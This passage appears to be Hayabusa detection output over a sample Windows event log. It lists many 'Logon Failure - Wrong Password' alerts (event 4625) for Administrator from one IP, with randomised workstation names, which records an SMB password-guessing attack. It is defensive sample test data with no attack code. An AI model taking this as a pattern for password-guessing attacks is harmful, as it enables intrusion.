NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcxQVtjMqnE1wGfr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fSRggYsSiJGsGSyV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQqfSKOyKLSILPrQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7oAI2q6YCu8btlK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KniVwndqE9aC6cIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FgQbvpfuS11matJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R9TwJS4B9ZaDD2Ze : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPUuoopOnwlTjlTP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9VEyOUuiOi8Q3JBJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGGGazMTBBfrppDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NKO4V35Y2qPEB59W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WxVdhpR7ZnAluurU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZjAZb9bQKZjwL8u : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aKyLX5ChpgBuFEbr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49t2xJvH2yHcyHle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sg9Z6Pyix2UkMolr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0NN2olYn97ZoYCja : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S98j54bDGsz0k6g9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxFEw9s0nnEQGzUN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSswFHFSlqcQd47k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7icutlVIWSLZJszQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSwyugYn0n3i5f25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmBaLCUcR7TmixTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1oOBz2NQSCdTwa7V : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O4tU1LPF5DRW9Vm0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRsSNqPYruWBzp2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3JZhBLzt4af1VtCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dFLZIKSDBvBaWq59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: guAG4ZTFMjZAxp1A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yd04xsSIdiczICeG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cx3i1URKPhC6KWI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Npc6IS27HsWP3JA9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIBnr0eZ1bHHGokW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6gTTrUVjpPU80LlC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZlmUbCNAJga24JH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zf3aSGBMe97VujaH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bx7ZM77aDG7y6Lh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BnHHAClMwyqA3TTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00ibRrYvnFt5w9X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VglTKbnLVFvHZHzQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NwX0sDFwHQG7Tkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3mMx3M1zurKMBzyj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sH7b8P0O0uea3PlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJcrTyBPuX0TcvOT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwuZIQAL3BmJnPsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxgAfsnH6YWLRD0a : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ttBOjzmEBjr9W2QW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FPDKGGYkJQeWgtUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nSoJWqS6YPbpCiBf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pr2oMzxv7pcDfsgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jiopmZAMpwg3dEaA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG1Bxm0lt3vwoO5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Kf5AaQX7KOVAIAN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW9nBirBTHIXIrfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9qKcDhfcf2kMk00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9NgStzf2xQ4P7q0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9mCrjQykX06IcMf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7S0QccvEhetekdDP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n1OnibuatFHwDeLz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8u26bKzFOw12m0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WEEtOj6BOkI7MPY1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiCpuqll36DojD3e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9zjo9ZsSVLZcrsr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KKDD0O5flEsIEDRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jdPMREVdBEJ50ELC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p7YwRYYCnsr2v08C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWyAzzpmxUm2CXE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9RNqhxyUBjUIic0n : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1JERyz3mOBZt2jki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0i93RW5AOsIKKMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U3XEu06vE68O900O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0fxeGE2jXOnoJttj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Wdg3l6IFHTdh09j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
